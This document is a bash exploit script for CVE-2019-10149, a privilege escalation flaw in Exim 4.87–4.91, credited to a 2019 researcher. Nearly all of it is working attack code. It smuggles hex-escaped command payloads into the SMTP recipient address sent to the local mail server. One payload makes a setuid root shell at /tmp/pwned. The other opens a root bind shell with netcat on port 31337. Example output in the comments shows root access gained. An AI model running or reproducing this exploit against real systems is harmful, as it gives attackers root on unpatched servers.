Exim 4.91 Local Privilege Escalation

`#!/bin/bash  
  
#  
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit  
# Copyright (c) 2019 Marco Ivaldi <[email protected]>  
#  
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).   
# Improper validation of recipient address in deliver_message()   
# function in /src/deliver.c may lead to remote command execution.  
# (CVE-2019-10149)  
#  
# This is a local privilege escalation exploit for "The Return   
# of the WIZard" vulnerability reported by the Qualys Security   
# Advisory team.  
#  
# Credits:  
# Qualys Security Advisory team (kudos for your amazing research!)  
# Dennis 'dhn' Herrmann (/dev/tcp technique)  
#  
# Usage (setuid method):  
# $ id  
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]  
# $ ./raptor_exim_wiz -m setuid  
# Preparing setuid shell helper...  
# Delivering setuid payload...  
# [...]  
# Waiting 5 seconds...  
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned  
# # id  
# uid=0(root) gid=0(root) groups=0(root)  
#  
# Usage (netcat method):  
# $ id  
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]  
# $ ./raptor_exim_wiz -m netcat  
# Delivering netcat payload...  
# Waiting 5 seconds...  
# localhost [127.0.0.1] 31337 (?) open  
# id  
# uid=0(root) gid=0(root) groups=0(root)  
#  
# Vulnerable platforms:  
# Exim 4.87 - 4.91  
#  
# Tested against:  
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]  
#  
  
METHOD="setuid" # default method  
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'  
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'  
  
# usage instructions  
function usage()  
{  
echo "$0 [-m METHOD]"  
echo  
echo "-m setuid : use the setuid payload (default)"  
echo "-m netcat : use the netcat payload"  
echo  
exit 1  
}  
  
# payload delivery  
function exploit()  
{  
# connect to localhost:25  
exec 3<>/dev/tcp/localhost/25  
  
# deliver the payload  
read -u 3 && echo $REPLY  
echo "helo localhost" >&3  
read -u 3 && echo $REPLY  
echo "mail from:<>" >&3  
read -u 3 && echo $REPLY  
echo "rcpt to:<$PAYLOAD>" >&3  
read -u 3 && echo $REPLY  
echo "data" >&3  
read -u 3 && echo $REPLY  
for i in {1..31}  
do  
echo "Received: $i" >&3  
done  
echo "." >&3  
read -u 3 && echo $REPLY  
echo "quit" >&3  
read -u 3 && echo $REPLY  
}  
  
# print banner  
echo  
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'  
echo 'Copyright (c) 2019 Marco Ivaldi <[email protected]>'  
echo  
  
# parse command line  
while [ ! -z "$1" ]; do  
case $1 in  
-m) shift; METHOD="$1"; shift;;  
* ) usage  
;;  
esac  
done  
if [ -z $METHOD ]; then  
usage  
fi  
  
# setuid method  
if [ $METHOD = "setuid" ]; then  
  
# prepare a setuid shell helper to circumvent bash checks  
echo "Preparing setuid shell helper..."  
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c  
gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null  
if [ $? -ne 0 ]; then  
echo "Problems compiling setuid shell helper, check your gcc."  
echo "Falling back to the /bin/sh method."  
cp /bin/sh /tmp/pwned  
fi  
echo  
  
# select and deliver the payload  
echo "Delivering $METHOD payload..."  
PAYLOAD=$PAYLOAD_SETUID  
exploit  
echo  
  
# wait for the magic to happen and spawn our shell  
echo "Waiting 5 seconds..."  
sleep 5  
ls -l /tmp/pwned  
/tmp/pwned  
  
# netcat method  
elif [ $METHOD = "netcat" ]; then  
  
# select and deliver the payload  
echo "Delivering $METHOD payload..."  
PAYLOAD=$PAYLOAD_NETCAT  
exploit  
echo  
  
# wait for the magic to happen and spawn our shell  
echo "Waiting 5 seconds..."  
sleep 5  
nc -v 127.0.0.1 31337  
  
# print help  
else  
usage  
fi  
`